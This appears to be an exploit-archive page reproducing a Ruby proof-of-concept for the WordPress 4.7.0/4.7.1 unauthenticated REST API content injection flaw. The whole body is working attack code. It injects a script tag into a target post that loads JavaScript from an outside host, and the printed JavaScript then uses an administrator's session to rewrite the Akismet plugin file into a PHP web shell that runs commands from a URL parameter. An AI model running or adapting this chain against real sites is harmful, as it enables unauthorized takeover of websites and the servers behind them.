Home / os / solaris

WordPress 4.7.0/4.7.1 Unauthenticated Content Injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>WordPress 4.7.0/4.7.1 Unauthenticated Content Injection </TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: WP Content Injection Shell Exploit # Date: 31 Jan' 2017 # Exploit Author: Harsh Jaiswal # Vendor Homepage: http://wordpress.org # Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2) # Tested on: Bacbox ubuntu Linux # Based on: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html # This will inject js in post, which on execution will change akismet plugin index.php file to our backdoor (brute parameter) :) # Credits : Marc, Sucuri, Brute # Lang : Ruby require 'rest-client' require 'json' puts "Enter Target URI (With wp directory)" targeturi = gets.chomp puts "Enter Post ID" postid = gets.chomp.to_i response = RestClient.post( "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}", { "id" => "#{postid}justtryingshell", "title" => "Shell Access Exploit", "content" => "Web shell access exploit <script src='http://yourjavascript.com/2211227783/wprce.js'></script>" }.to_json, :content_type => :json, :accept => :json ) {|response, request, result| response } if(response.code == 200) puts "Done! After js execution in admin panel, you will have shell access at '#{targeturi}/wp-content/plugins/akismet/index.php?brute=id'" else puts "This site is not Vulnerable" end #--- wprce.js --- # x=new XMLHttpRequest() p='/wp-admin/plugin-editor.php?' f='file=akismet/index.php' x.open('GET',p+f,0) x.send() $='_wpnonce='+/ce" value="([^"]*?)"/.exec(x.responseText)[1]+'&newcontent=<?=`$_GET[brute]`;&action=update&'+f x.open('POST',p+f,1) x.setRequestHeader('Content-Type','application/x-www-form-urlencoded') x.send($) #--- EOF --- #</BODY></HTML>

 

TOP